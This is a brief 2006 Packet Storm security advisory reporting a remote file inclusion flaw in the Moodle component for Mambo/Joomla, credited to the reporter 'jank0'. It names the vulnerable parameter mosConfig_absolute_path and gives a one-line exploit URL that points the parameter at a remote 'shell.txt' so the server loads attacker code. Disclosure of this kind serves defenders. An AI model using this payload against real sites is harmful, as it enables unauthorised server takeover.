mammoodle.txt

2006-07-24T00:00:00
ID PACKETSTORM:48492
Type packetstorm
Reporter jank0
Modified 2006-07-24T00:00:00

Description

                                        
                                            `####################################################################################  
#Mam - Moodle Remote File Include  
------------------------------------------------------------------------------------  
#Bug Found by: jank0  
#greetz: hackbsd crew  
#risk: dangerous  
##this bug allows a remote atacker to execute commands via rfi  
  
path: ?mosConfig_absolute_path=  
  
xpl:  
http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt  
  
  
Contact: irc.undernet.org #hackbsd`